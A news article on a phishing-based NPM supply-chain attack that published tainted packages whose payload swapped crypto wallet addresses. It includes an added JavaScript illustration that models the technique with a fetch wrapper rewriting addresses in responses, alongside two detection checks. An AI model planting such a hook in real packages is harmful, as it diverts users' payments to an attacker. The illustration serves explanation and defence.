
Several web3 and DeFi platforms, including Uniswap and Aave, stated that they were unaffected.
Ledger’s chief technology officer said Tuesday that a widely watched supply-chain attack on the Node Package Manager ecosystem “fortunately failed,” with “almost no victims,” after a phishing campaign let attackers publish malicious updates to popular JavaScript packages before the compromise was detected and shut down.
Charles Guillemet, Ledger’s CTO, said the incident began with emails sent from a spoofed NPM support domain that harvested maintainers’ credentials. With those credentials the attackers published tainted versions of the packages, carrying a payload that hooks wallet and web-crypto activity across Ethereum, Solana, and other chains and swaps destination addresses inside network responses, so that a user who intends to pay one address ends up signing a transfer to the attacker’s.
He added that implementation mistakes in the payload caused CI/CD pipelines to crash, which triggered rapid discovery and limited the impact. “The immediate danger may have passed, but the threat hasn’t,” Ledger’s CTO wrote on X, urging users to favor hardware wallets and clear signing protections. The attackers netted only about $503 in crypto, according to onchain analytics firm Arkham, which said the funds went to the addresses cited by Guillemet in his initial alert.
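The following is an added illustration, not code from the article, from Ledger, or from the compromised packages: a minimal model of the address-swapping technique described above (a dependency wrapping `fetch` and rewriting EVM-style addresses in response bodies), alongside two checks a dapp or user can apply. Node 18+ is assumed for the global `Response`; the attacker and recipient addresses, the backend stand-in and the function names are all constructed placeholders, not values from the incident.

```javascript
// Added example (not the article's or Ledger's code). Node 18+ assumed (global Response).
const EVM_ADDRESS = /0x[0-9a-fA-F]{40}/g;

// Constructed placeholder addresses; not addresses involved in the real incident.
const ATTACKER_ADDRESS = '0x' + 'ab'.repeat(20);
const GENUINE_RECIPIENT = '0x' + '12'.repeat(20);

// The core of the technique: rewrite every EVM-style address found in a response body.
// (Real payloads would also match other chains' address formats; EVM is enough here.)
function swapAddresses(body, attackerAddress = ATTACKER_ADDRESS) {
  return body.replace(EVM_ADDRESS, attackerAddress);
}

// What a tainted package could install at import time: a fetch replacement that
// returns a rebuilt Response whose body has been run through swapAddresses.
function installAddressSwapper(originalFetch, attackerAddress = ATTACKER_ADDRESS) {
  return async function swappedFetch(...args) {
    const resp = await originalFetch(...args);
    const tampered = swapAddresses(await resp.text(), attackerAddress);
    return new Response(tampered, { status: resp.status, headers: resp.headers });
  };
}

// Constructed offline stand-in for a dapp backend returning a payment quote.
async function fakeUpstream(_url) {
  return new Response(JSON.stringify({ to: GENUINE_RECIPIENT, amount: '1.0' }), {
    status: 200,
    headers: { 'content-type': 'application/json' },
  });
}

// Check 1: a JavaScript wrapper around a built-in stops being native code.
// Run at startup against fetch, XMLHttpRequest.prototype.open and similar globals;
// a non-native result means something in the bundle has hooked the network layer.
function isNativeFunction(fn) {
  return typeof fn === 'function' &&
    /\[native code\]\s*\}\s*$/.test(Function.prototype.toString.call(fn));
}

// Check 2, the "clear signing" idea: the recipient that will actually be signed must
// equal the recipient the user entered, compared without trusting any API response.
function recipientMatches(intendedRecipient, presentedRecipient) {
  return intendedRecipient.toLowerCase() === presentedRecipient.toLowerCase();
}

// Walk through the attack: clean response, hooked response, and what the checks say.
async function demo() {
  const clean = await (await fakeUpstream('/api/quote')).json();
  const hookedFetch = installAddressSwapper(fakeUpstream);
  const tampered = await (await hookedFetch('/api/quote')).json();
  return {
    cleanTo: clean.to,
    tamperedTo: tampered.to,
    hookedFetchIsNative: isNativeFunction(hookedFetch),
    userWouldCatchIt: !recipientMatches(GENUINE_RECIPIENT, tampered.to),
  };
}

demo().then((r) => console.log(r)).catch((e) => console.error(e.message));
```

The native-code check is a cheap tripwire, not a guarantee: a hook installed through `Function.prototype.bind` or a `Proxy` still reports `[native code]`, and a payload can patch `Function.prototype.toString` itself. The recipient comparison is the check that actually holds, which is why the advice above is to confirm the destination on a hardware wallet's own display rather than in the page that rendered it.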
The update follows Monday’s industry-wide alert, as reported by The Block, in which security experts urged developers and users to pause onchain activity amid a large NPM supply-chain event targeting web3 projects. By early Tuesday, multiple crypto teams, including Uniswap, Morpho, MetaMask, OKX Wallet, Sui, Aave, Trezor, and Lido, reported they were not affected.
Security collective SEAL Org called the outcome “lucky,” noting a compromised account with packages downloaded “billions” of times weekly could have yielded “untold riches” had the payload been stealthier.
While the take was minimal this time, industry veterans like Guillemet warned that software supply-chain compromises remain a powerful malware vector and are becoming increasingly targeted. The Block recently covered investigative work showing attackers embedding command-and-control instructions in Ethereum smart contracts to steer NPM-distributed malware, a sign that adversaries are blending onchain and open-source tactics to dodge detection.

